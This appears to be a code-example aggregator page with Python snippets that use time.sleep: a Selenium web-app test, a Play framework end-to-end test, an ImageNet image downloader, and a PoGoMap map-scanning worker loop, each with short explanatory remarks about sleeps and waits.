        #download_button = self.browser.find_element_by_css_selector("button[class='ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only']")
        #download_button.click()

        close_button = self.browser.find_element_by_css_selector("a[class='ui-dialog-titlebar-close ui-corner-all']")
        close_button.click()

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Participant with the name user1 logs in, goes to participating session
        # page and selects the session session1 of user admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        show_participant_respond_from_iterations_options = self.browser.find_elements_by_xpath(
            "//select[@id='responseSelection']/option")
        show_participant_respond_from_iterations_options[2].click()

        # Wait until the response from the selected iteration appear
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_id("participationSessionsContentGridsDiv"))

        show_participant_result_from_iterations_options = self.browser.find_elements_by_xpath(
            "//select[@id='resultSelection']/option")
        show_participant_result_from_iterations_options[2].click()

        # Wait until the results from the selected iteration appear
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_id("clearResultsButton"))

        time.sleep(2)

        # user logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Facilitator admin logs in, selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Facilitator clicks the button to save the grid
        concern_1_left = self.browser.find_element_by_name("concern_1_left")
        ActionChains(self.browser).move_to_element(concern_1_left).perform()
        save_grid_button = self.browser.find_element_by_css_selector("img[title='download grid as']")
        save_grid_button.click()

        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("select[name='convertTo']"))

        # User types value for filename
        grid_file_name = self.browser.find_element_by_name("fileName")
        grid_file_name.send_keys('sessionGrid')

        #for future use
        #download_button = self.browser.find_element_by_css_selector("button[class='ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only']")
        #download_button.click()

        close_button = self.browser.find_element_by_css_selector("a[class='ui-dialog-titlebar-close ui-corner-all']")
        close_button.click()

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()
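
Several of the fixed pauses in this test (for example the time.sleep(2) after browser.refresh()) only give the page time to re-render before an element is read. When the condition can be expressed as an element or a piece of text, Selenium's explicit waits poll for it internally. The sketch below is a generic illustration under that assumption and is not part of the test above; it presumes a WebDriver instance named browser.

from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait

def wait_for_text(browser, element_id, text, timeout=10):
    # Block until the element with the given id contains the expected text,
    # polling internally instead of relying on a fixed time.sleep().
    return WebDriverWait(browser, timeout).until(
        EC.text_to_be_present_in_element((By.ID, element_id), text)
    )

For instance, wait_for_text(browser, "sessionDetails", "1/2") could replace the sleep that follows browser.refresh() when checking the participation counter.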

Example 25

Project: databus
Source File: tests.py
View license
    def testSimpleProjectCreation(self):

        # Well
        step('Hello, I\'m a developer')
        
        self.working_directory = bootstrapWorkingDirectory('i-am-working-here')
        
        # play new yop
        step('Create a new project')
        
        self.play = callPlay(self, ['new', '%s/yop' % self.working_directory, '--name=YOP'])
        self.assert_(waitFor(self.play, 'The new application will be created'))
        self.assert_(waitFor(self.play, 'OK, the application is created'))
        self.assert_(waitFor(self.play, 'Have fun!'))
        self.play.wait()
        
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/controllers')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/controllers/Application.java')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/models')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/Application')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/Application/index.html')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/main.html')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/errors/404.html')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/errors/500.html')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/conf')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/conf/routes')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/conf/messages')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/conf/application.conf')))

        app = '%s/yop' % self.working_directory

        # Run the newly created application
        step('Run the newly created application')
        
        self.play = callPlay(self, ['run', app])
        self.assert_(waitFor(self.play, 'Listening for HTTP on port 9000'))
        
        # Start a browser
        step('Start a browser')
        
        browser = mechanize.Browser()
        
        # Open the home page
        step('Open the home page')
        
        response = browser.open('http://localhost:9000/')
        self.assert_(waitFor(self.play, "Application 'YOP' is now started !"))
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')
        
        html = response.get_data()
        self.assert_(html.count('Your application is ready !'))
        
        # Open the documentation
        step('Open the documentation')
    
        browser.addheaders = [("Accept-Language", "en")]
        response = browser.open('http://localhost:9000/@documentation')
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Play manual - Documentation')
        
        html = response.get_data()
        self.assert_(html.count('Getting started'))
        
        # Go back to home
        step('Go back to home')
        
        response = browser.back()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')
        
        # Refresh
        step('Refresh home')
        
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')        
        html = response.get_data()
        self.assert_(html.count('Your application is ready !'))
        
        # Make a mistake in Application.java and refresh
        step('Make a mistake in Application.java')
        
        edit(app, 'app/controllers/Application.java', 13, '        render()')        
        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Compilation error'))
            self.assert_(html.count('insert ";" to complete BlockStatements'))
            self.assert_(html.count('In /app/controllers/Application.java (around line 13)'))
            self.assert_(html.count('       render()'))            
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Compilation error (In /app/controllers/Application.java around line 13)'))
            self.assert_(waitFor(self.play, 'Syntax error, insert ";" to complete BlockStatements'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))

        # Refresh again
        step('Refresh again')

        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Compilation error'))
            self.assert_(html.count('insert ";" to complete BlockStatements'))
            self.assert_(html.count('In /app/controllers/Application.java (around line 13)'))
            self.assert_(html.count('       render()'))            
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Compilation error (In /app/controllers/Application.java around line 13)'))
            self.assert_(waitFor(self.play, 'Syntax error, insert ";" to complete BlockStatements'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
        
        # Correct the error
        step('Correct the error')
        
        edit(app, 'app/controllers/Application.java', 13, '        render();')
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')        
        html = response.get_data()
        self.assert_(html.count('Your application is ready !'))

        # Refresh again
        step('Refresh again')
        
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')        
        html = response.get_data()
        self.assert_(html.count('Your application is ready !'))
        
        # Let's code hello world
        step('Let\'s code hello world')
        time.sleep(1)
        
        edit(app, 'app/controllers/Application.java', 12, '  public static void index(String name) {')
        edit(app, 'app/controllers/Application.java', 13, '        render(name);')
        edit(app, 'app/views/Application/index.html', 2, "#{set title:'Hello world app' /}")
        edit(app, 'app/views/Application/index.html', 4, "Hello ${name} !!")
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello  !!'))
        
        response = browser.open('http://localhost:9000/?name=Guillaume')
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello Guillaume !!'))
        
        # Make a mistake in the template
        step('Make a mistake in the template')
        time.sleep(1)
        
        edit(app, 'app/views/Application/index.html', 4, "Hello ${name !!")
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines()) 
            self.assert_(html.count('Template compilation error'))
            self.assert_(html.count('In /app/views/Application/index.html (around line 4)'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Template compilation error (In /app/views/Application/index.html around line 4)'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
        
        # Refresh again
        step('Refresh again')
        
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines()) 
            self.assert_(html.count('Template compilation error'))
            self.assert_(html.count('In /app/views/Application/index.html (around line 4)'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Template compilation error (In /app/views/Application/index.html around line 4)'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            
        # Try a template runtime exception  
        step('Try a template runtime exception ')  
        time.sleep(1)
        
        edit(app, 'app/views/Application/index.html', 4, "Hello ${user.name}")
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines()) 
            self.assert_(html.count('Template execution error '))
            self.assert_(html.count('In /app/views/Application/index.html (around line 4)'))
            self.assert_(html.count('Cannot get property \'name\' on null object'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Template execution error (In /app/views/Application/index.html around line 4)'))
            self.assert_(waitFor(self.play, 'Execution error occured in template /app/views/Application/index.html.'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            self.assert_(waitFor(self.play, 'at /app/views/Application/index.html.(line:4)'))
            self.assert_(waitFor(self.play, '...'))

        # Refresh again
        step('Refresh again')
        
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines()) 
            self.assert_(html.count('Template execution error '))
            self.assert_(html.count('In /app/views/Application/index.html (around line 4)'))
            self.assert_(html.count('Cannot get property \'name\' on null object'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Template execution error (In /app/views/Application/index.html around line 4)'))
            self.assert_(waitFor(self.play, 'Execution error occured in template /app/views/Application/index.html.'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            self.assert_(waitFor(self.play, 'at /app/views/Application/index.html.(line:4)'))
            self.assert_(waitFor(self.play, '...'))

        # Fix it
        step('Fix it')        
        time.sleep(1)
        
        edit(app, 'app/views/Application/index.html', 4, "Hello ${name} !!")
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello Guillaume !!'))

        # Make a Java runtime exception
        step('Make a Java runtime exception')  
        
        insert(app, 'app/controllers/Application.java', 13, '        int a = 9/0;')     
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Execution exception'))
            self.assert_(html.count('/ by zero'))
            self.assert_(html.count('In /app/controllers/Application.java (around line 13)'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Execution exception (In /app/controllers/Application.java around line 13)'))
            self.assert_(waitFor(self.play, 'ArithmeticException occured : / by zero'))
            self.assert_(waitFor(self.play, 'at controllers.Application.index(Application.java:13)'))
            self.assert_(waitFor(self.play, '...'))

        # Refresh again
        step('Refresh again')
        
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Execution exception'))
            self.assert_(html.count('/ by zero'))
            self.assert_(html.count('In /app/controllers/Application.java (around line 13)'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Execution exception (In /app/controllers/Application.java around line 13)'))
            self.assert_(waitFor(self.play, 'ArithmeticException occured : / by zero'))
            self.assert_(waitFor(self.play, 'at controllers.Application.index(Application.java:13)'))
            self.assert_(waitFor(self.play, '...'))

        # Fix it
        step('Fix it')        
        time.sleep(1)
        
        delete(app, 'app/controllers/Application.java', 13)    
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello Guillaume !!'))

        # Refresh again
        step('Refresh again')
        
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello Guillaume !!'))

        # Create a new route
        step('Create a new route')
        
        insert(app, 'conf/routes', 7, "GET      /hello          Hello.hello")
        try:
            response = browser.open('http://localhost:9000/hello')
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Not found')
        
        # Create the new controller
        step('Create the new controller')
        time.sleep(1)
        
        create(app, 'app/controllers/Hello.java')
        insert(app, 'app/controllers/Hello.java', 1, "package controllers;")
        insert(app, 'app/controllers/Hello.java', 2, "import play.mvc.*;")
        insert(app, 'app/controllers/Hello.java', 3, "public class Hello extends Application {")
        insert(app, 'app/controllers/Hello.java', 4, "  public static void hello() {")
        insert(app, 'app/controllers/Hello.java', 5, '      renderText("Hello");')
        insert(app, 'app/controllers/Hello.java', 6, '  }')
        insert(app, 'app/controllers/Hello.java', 7, '}')
        
        # Retry
        step('Retry')
        
        browser.reload()
        self.assert_(not browser.viewing_html())   
        html = response.get_data()
        self.assert_(html.count('Hello'))
        
        # Rename the Hello controller
        step('Rename the Hello controller')
        time.sleep(1)
        
        rename(app, 'app/controllers/Hello.java', 'app/controllers/Hello2.java')
        edit(app, 'app/controllers/Hello2.java', 3, "public class Hello2 extends Application {")
        
        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Not found')

        # Refresh again
        step('Refresh again')
            
        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Not found')            

        # Correct the routes file
        step('Correct the routes file')
        time.sleep(1)

        edit(app, 'conf/routes', 7, "GET      /hello          Hello2.hello")

        browser.reload()
        self.assert_(not browser.viewing_html())   
        html = response.get_data()
        self.assert_(html.count('Hello'))        

        # Retry
        step('Retry')
        
        browser.reload()
        self.assert_(not browser.viewing_html())   
        html = response.get_data()
        self.assert_(html.count('Hello'))
        
        # Rename again
        step('Rename again')
        time.sleep(1)
        
        rename(app, 'app/controllers/Hello2.java', 'app/controllers/Hello3.java')
        edit(app, 'conf/routes', 7, "GET      /hello          Hello3.hello")
        
        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Compilation error'))
            self.assert_(html.count('/app/controllers/Hello3.java</strong> could not be compiled'))
            self.assert_(html.count('The public type Hello2 must be defined in its own file'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Compilation error (In /app/controllers/Hello3.java around line 3)'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            
        # Refresh again
        step('Refresh again')

        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Compilation error'))
            self.assert_(html.count('/app/controllers/Hello3.java</strong> could not be compiled'))
            self.assert_(html.count('The public type Hello2 must be defined in its own file'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Compilation error (In /app/controllers/Hello3.java around line 3)'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            
        # Fix it
        step('Fix it')
        
        edit(app, 'app/controllers/Hello3.java', 3, "public class Hello3 extends Application {")
        browser.reload()
        self.assert_(not browser.viewing_html())   
        html = response.get_data()
        self.assert_(html.count('Hello'))

        # Stop the application
        step('Kill play')
        
        killPlay()
        self.play.wait()
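
The one-second sleeps before each edit() call most likely exist to guarantee that consecutive edits get distinct file-modification timestamps, since Play's development-mode reloader detects changes by mtime and many filesystems only resolve mtimes to the second. A small alternative, shown here only as a sketch and not part of the test above, is to sleep just until the clock has moved past the file's current mtime.

import os
import time

def wait_for_new_mtime(path):
    # Sleep in small steps until the wall clock is at least one second past
    # the file's current modification time, so the next edit is guaranteed
    # to produce a newer timestamp that the reloader can notice.
    mtime = os.path.getmtime(path)
    while time.time() < mtime + 1.0:
        time.sleep(0.1)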

Example 26

View license
def download_list(list_file,
                  timeout=10,
                  retry=10,
                  num_jobs=1,
                  sleep_after_dl=1,
                  verbose=False,
                  offset=0,
                  msg=1):
    """Try to download all images whose URLs are listed in 'list_file'
    and register them with Collective Knowledge.

    The file is expected to have lines in either of the forms:

    a) <category>_<index> <url>

    Example:
    n04515003_4421  http://www.danheller.com/images/Europe/CzechRepublic/Prague/Misc/upright-bass-n-piano.jpg

    That is, the WordNet ID of a category ("category" for short)
    concatenated with a unique index, followed by a URL.

    The downloaded image will be added to a local CK repository called
    "imagenet-<category>" as a dataset entry called "<index>",
    tagged with "imagenet", <category>, <index>, <url>.

    b) <url>
    http://www.danheller.com/images/Europe/CzechRepublic/Prague/Misc/upright-bass-n-piano.jpg

    The downloaded image will be added to a local CK repository called
    "imagenet-unknown" as a dataset with a unique random index,
    tagged with "imagenet" and <url>.
    """

    #make_directory(out_dir)

    count_total = 0
    with open(list_file) as list_in:
        for i, l in enumerate(list_in):
            pass
        count_total = i + 1
    count_total -= offset

    sys.stderr.write('Total: {0}\n'.format(count_total))

    num_jobs = max(num_jobs, 1)

    entries = Queue.Queue(num_jobs)
    done = [False]

    counts_fail = [0 for i in xrange(num_jobs)]
    counts_success = [0 for i in xrange(num_jobs)]

    def producer():
        count = 0
        with open(list_file) as list_in:
            for line in list_in:
                if count >= offset:
                    sep = None; max_split = 1
                    prefix_url = line.strip().split(sep, max_split)
                    if len(prefix_url) == 2: # prefix and URL
                        prefix = prefix_url[0]
                        url = prefix_url[1]
                        category_index = prefix.split('_', max_split)
                        if len(category_index) == 2: # category and index
                            category = category_index[0]
                            index = category_index[1]
                        elif len(category_index) == 1: # category only
                            category = category_index[0]
                            index = count
                        else:
                            if verbose:
                                sys.stderr.write('Error: Invalid line: {0}\n'.format(line))
                    elif len(prefix_url) == 1: # URL only
                        url = prefix_url[0]
                        category = "unknown"
                        index = count
                    else:
                        if verbose:
                            sys.stderr.write('Error: Invalid line: {0}\n'.format(line))
                    entries.put((category, index, url), block=True)
                count += 1

        entries.join()
        done[0] = True

    def consumer(i):
        while not done[0]:
            try:
                category, index, url = entries.get(timeout=1)
            except:
                continue

            try:
                # Try adding a CK repository for this category.
                repo_uoa = 'local'; module_uoa = 'repo'; data_uoa = 'imagenet-%s' % category
                r=ck.access({
                    'action':'add',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa
                })
                if r['return']>0:
                    # If already exists, give a warning rather than an error.
                    if r['return']==16:
                        if verbose:
                            sys.stdout.write ("CK info: repository for category \'%s\' already exists.\n" % category)
                    else:
                        if verbose:
                            sys.stderr.write ("CK error: %s\n" % r['error'])
                        counts_fail[i] += 1
                        continue

                # Get the CK repository for this category.
                # FIXME: "ck add --help" says that it returns
                # "Output from the 'create_entry' function".
                # It may be possible to extract the repo uoa for this category
                # from it but it's unclear what it contains...
                r=ck.access({
                    'action':'search',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue
                if len(r['lst'])!=1:
                    if verbose:
                        sys.stderr.write ("CK error: %d repositories found, expected 1\n" % len(r['lst']))
                    counts_fail[i] += 1
                    continue
                
                # Search for an image by the given category URL.
                # (Ignore the index as it may not be unique.)
                repo_uoa=r['lst'][0]['data_uoa']
                module_uoa='dataset'
                tags='imagenet,%s,%s' % (category,url)
                r=ck.access({
                    'action':'search',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'tags':tags
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue
                if len(r['lst'])>0:
                    # If already exists, give a warning rather than an error.
                    if verbose:
                        sys.stdout.write ("CK info: image at \'%s\' already downloaded\n" % url)
                    counts_success[i] += 1
                    entries.task_done()
                    continue
                
                # Add the given image to the repository for this category. 
                data_uoa=str(index).zfill(9)
                r=ck.access({
                    'action':'add',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa,
                    'tags':tags
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue
                # FIXME: "ck add --help" says that it returns
                # "Output from the 'create_entry' function".
                # It may be possible to extract the repo uoa for this category
                # from it but it's unclear what it contains...
                r=ck.access({
                    'action':'search',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue
                if len(r['lst'])!=1:
                    if verbose:
                        sys.stderr.write ("CK error: %d dataset entries found, expected 1\n" % len(r['lst']))
                    counts_fail[i] += 1
                    continue

                # Download the image into the image dataset directory.
                directory = r['lst'][0]['path']
                content = download(url, timeout, retry, sleep_after_dl)
                ext = imgtype2ext(imghdr.what('', content))
                name = '{0}.{1}'.format(category, ext)
                path = os.path.join(directory, name)
                with open(path, 'w') as f:
                    f.write(content)

                # Download the image category description.
                words_url = "http://www.image-net.org/api/text/wordnet.synset.getwords?wnid=%s" % category
                content = download(words_url, timeout, retry, sleep_after_dl)
                all_words = content.split("\n")

                # Update the image metadata.
                info={}
                info['dataset_files'] = [ name ]
                info['dataset_words'] = [ word for word in all_words if word != ""]
                r=ck.access({
                    'action':'update',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa,
                    'dict':info
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue

                counts_success[i] += 1
                time.sleep(sleep_after_dl)

            except Exception as e:
                counts_fail[i] += 1
                if verbose:
                    sys.stderr.write('Error: {0} / {1}: {2}\n'.format(category, url, e))

            entries.task_done()

    def message_loop():
        if verbose:
            delim = '\n'
        else:
            delim = '\r'

        while not done[0]:
            count_success = sum(counts_success)
            count = count_success + sum(counts_fail)
            rate_done = count * 100.0 / count_total
            if count == 0:
                rate_success = 0
            else:
                rate_success = count_success * 100.0 / count
            sys.stderr.write(
                '{0} / {1} ({2: 2.2f}%) done, {3} / {0} ({4: 2.2f}%) succeeded                    {5}'.format(
                    count, count_total, rate_done, count_success, rate_success, delim))

            time.sleep(msg)

    producer_thread = threading.Thread(target=producer)
    consumer_threads = [threading.Thread(target=consumer, args=(i,)) for i in xrange(num_jobs)]
    message_thread = threading.Thread(target=message_loop)

    producer_thread.start()
    for t in consumer_threads:
        t.start()
    message_thread.start()

    # Explicitly wait to accept SIGINT
    try:
        while producer_thread.isAlive():
            time.sleep(1)
    except:
        sys.exit(1)

    producer_thread.join()
    for t in consumer_threads:
        t.join()
    message_thread.join()

    sys.stderr.write('\ndone\n')
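
The ImageNet downloader above leans on time.sleep in two ways: each worker pauses for sleep_after_dl seconds after every download so the remote server is not hammered, and the main thread idles in one-second sleeps while the producer runs so Ctrl-C (SIGINT) is still handled promptly. A minimal sketch of that throttled-worker pattern, with hypothetical names (fetch_one, ITEMS and DELAY are placeholders, not taken from the project above):

import threading
import time
from queue import Queue  # Python 3; the project above targets Python 2

ITEMS = ['img-001', 'img-002', 'img-003']  # hypothetical work items
DELAY = 0.5                                # polite pause between downloads

def fetch_one(item):
    # Stand-in for the real download and bookkeeping.
    print('fetched', item)

def worker(q):
    while True:
        item = q.get()
        if item is None:       # sentinel: no more work
            break
        fetch_one(item)
        time.sleep(DELAY)      # throttle, like sleep_after_dl above
        q.task_done()

q = Queue()
for it in ITEMS:
    q.put(it)
q.put(None)

t = threading.Thread(target=worker, args=(q,))
t.start()

# Keep the main thread in short sleeps so KeyboardInterrupt is still delivered.
try:
    while t.is_alive():
        time.sleep(1)
except KeyboardInterrupt:
    pass
t.join()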

Example 27

Project: PoGoMap-GUI
Source File: search.py
View license
def search_worker_thread(args, account_queue, account_failures, search_items_queue, pause_bit, encryption_lib_path, status, dbq, whq):

    log.debug('Search worker thread starting')

    # The outer forever loop restarts only when the inner one is intentionally exited - which should only be done when the worker is failing too often, and probably banned.
    # This reinitializes the API and grabs a new account from the queue.
    while True:
        try:
            status['starttime'] = now()

            # Get account
            status['message'] = 'Waiting to get new account from the queue'
            log.info(status['message'])
            account = account_queue.get()
            status['message'] = 'Switching to account {}'.format(account['username'])
            status['user'] = account['username']
            log.info(status['message'])

            stagger_thread(args, account)

            # New lease of life right here
            status['fail'] = 0
            status['success'] = 0
            status['noitems'] = 0
            status['skip'] = 0
            status['location'] = False
            status['last_scan_time'] = 0

            # only sleep when consecutive_fails reaches max_failures, overall fails for stat purposes
            consecutive_fails = 0

            # Create the API instance this will use
            if args.mock != '':
                api = FakePogoApi(args.mock)
            else:
                api = PGoApi()

            if status['proxy_url']:
                log.debug("Using proxy %s", status['proxy_url'])
                api.set_proxy({'http': status['proxy_url'], 'https': status['proxy_url']})

            api.activate_signature(encryption_lib_path)

            # The forever loop for the searches
            while True:

                # If this account has been messing up too hard, let it rest
                if consecutive_fails >= args.max_failures:
                    status['message'] = 'Account {} failed more than {} scans; possibly bad account. Switching accounts...'.format(account['username'], args.max_failures)
                    log.warning(status['message'])
                    account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'failures'})
                    break  # exit this loop to get a new account and have the API recreated

                while pause_bit.is_set():
                    status['message'] = 'Scanning paused'
                    time.sleep(2)

                # If this account has been running too long, let it rest
                if (args.account_search_interval is not None):
                    if (status['starttime'] <= (now() - args.account_search_interval)):
                        status['message'] = 'Account {} is being rotated out to rest.'.format(account['username'])
                        log.info(status['message'])
                        account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'rest interval'})
                        break

                # Grab the next thing to search (when available)
                status['message'] = 'Waiting for item from queue'
                step, step_location, appears, leaves = search_items_queue.get()

                # too soon?
                if appears and now() < appears + 10:  # adding a 10 second grace period
                    first_loop = True
                    paused = False
                    while now() < appears + 10:
                        if pause_bit.is_set():
                            paused = True
                            break  # why can't python just have `break 2`...
                        remain = appears - now() + 10
                        status['message'] = 'Early for {:6f},{:6f}; waiting {}s...'.format(step_location[0], step_location[1], remain)
                        if first_loop:
                            log.info(status['message'])
                            first_loop = False
                        time.sleep(1)
                    if paused:
                        search_items_queue.task_done()
                        continue

                # too late?
                if leaves and now() > (leaves - args.min_seconds_left):
                    search_items_queue.task_done()
                    status['skip'] += 1
                    # it is slightly silly to put this in status['message'] since it'll be overwritten very shortly after. Oh well.
                    status['message'] = 'Too late for location {:6f},{:6f}; skipping'.format(step_location[0], step_location[1])
                    log.info(status['message'])
                    # No sleep here; we've not done anything worth sleeping for. Plus we clearly need to catch up!
                    continue

                # Let the api know where we intend to be for this loop
                # doing this before check_login so it does not also have to be done there
                # when the auth token is refreshed
                api.set_position(*step_location)

                # Ok, let's get started -- check our login status
                check_login(args, account, api, step_location, status['proxy_url'])

                # putting this message after the check_login so the messages aren't out of order
                status['message'] = 'Searching at {:6f},{:6f}'.format(step_location[0], step_location[1])
                log.info(status['message'])

                # Make the actual request (finally!)
                response_dict = map_request(api, step_location, args.jitter)

                # G'damnit, nothing back. Mark it up, sleep, carry on
                if not response_dict:
                    status['fail'] += 1
                    consecutive_fails += 1
                    status['message'] = 'Invalid response at {:6f},{:6f}, abandoning location'.format(step_location[0], step_location[1])
                    log.error(status['message'])
                    time.sleep(args.scan_delay)
                    continue

                # Got the response, parse it out, send todo's to db/wh queues
                try:
                    parsed = parse_map(args, response_dict, step_location, dbq, whq, api)
                    search_items_queue.task_done()
                    status[('success' if parsed['count'] > 0 else 'noitems')] += 1
                    consecutive_fails = 0
                    status['message'] = 'Search at {:6f},{:6f} completed with {} finds'.format(step_location[0], step_location[1], parsed['count'])
                    log.debug(status['message'])
                except KeyError:
                    parsed = False
                    status['fail'] += 1
                    consecutive_fails += 1
                    status['message'] = 'Map parse failed at {:6f},{:6f}, abandoning location. {} may be banned.'.format(step_location[0], step_location[1], account['username'])
                    log.exception(status['message'])

                # Get detailed information about gyms
                if args.gym_info and parsed:
                    # build up a list of gyms to update
                    gyms_to_update = {}
                    for gym in parsed['gyms'].values():
